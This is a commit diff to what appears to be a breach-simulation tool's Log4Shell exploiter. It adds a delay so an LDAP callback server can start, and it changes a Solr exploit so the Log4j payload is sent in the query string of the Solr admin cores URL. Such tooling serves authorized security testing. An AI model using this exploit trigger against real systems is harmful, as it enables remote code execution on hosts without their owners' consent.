Agent: fix race condition between ldap server and malicious requests
This commit is contained in:
parent
b94c8e54e2
commit
9f5034a8e5
|
@ -34,6 +34,7 @@ class Log4ShellExploiter(WebRCE):
|
||||||
_EXPLOITED_SERVICE = "Log4j"
|
_EXPLOITED_SERVICE = "Log4j"
|
||||||
DOWNLOAD_TIMEOUT = 15
|
DOWNLOAD_TIMEOUT = 15
|
||||||
REQUEST_TO_VICTIM_TIME = 5 # How long the request from victim to monkey might take. In seconds
|
REQUEST_TO_VICTIM_TIME = 5 # How long the request from victim to monkey might take. In seconds
|
||||||
|
LDAP_SERVER_INIT_DELAY = 5 # Time period that code halts waiting for ldap server to start
|
||||||
|
|
||||||
def __init__(self, host: VictimHost):
|
def __init__(self, host: VictimHost):
|
||||||
super().__init__(host)
|
super().__init__(host)
|
||||||
|
@ -111,6 +112,8 @@ class Log4ShellExploiter(WebRCE):
|
||||||
# constructor directly after merging to the agent-refactor branch.
|
# constructor directly after merging to the agent-refactor branch.
|
||||||
self._ldap_server_thread = Thread(target=self._ldap_server.run, daemon=True)
|
self._ldap_server_thread = Thread(target=self._ldap_server.run, daemon=True)
|
||||||
self._ldap_server_thread.start()
|
self._ldap_server_thread.start()
|
||||||
|
logger.debug(f"Sleeping {Log4ShellExploiter.LDAP_SERVER_INIT_DELAY} seconds for ldap process to start")
|
||||||
|
sleep(Log4ShellExploiter.LDAP_SERVER_INIT_DELAY)
|
||||||
|
|
||||||
def _stop_servers(self):
|
def _stop_servers(self):
|
||||||
logger.debug("Stopping all LDAP and HTTP Servers")
|
logger.debug("Stopping all LDAP and HTTP Servers")
|
||||||
|
|
|
@ -13,9 +13,10 @@ class SolrExploit(IServiceExploiter):
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def trigger_exploit(payload: str, host: VictimHost, port: int):
|
def trigger_exploit(payload: str, host: VictimHost, port: int):
|
||||||
url = f"http://{host.ip_addr}:{port}/solr/admin/cores"
|
url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}"
|
||||||
payload = {"foo": payload}
|
|
||||||
try:
|
try:
|
||||||
resp = requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123
|
logger.debug("Sending malicious SOLR log4j request")
|
||||||
|
requests.post(url, timeout=5, verify=False) # noqa DUO123
|
||||||
|
logger.debug("Request sent")
|
||||||
except requests.ReadTimeout as e:
|
except requests.ReadTimeout as e:
|
||||||
logger.debug(f"Log4shell request failed {e}")
|
logger.debug(f"Log4shell request failed {e}")
|
||||||
|
|
Loading…
Reference in New Issue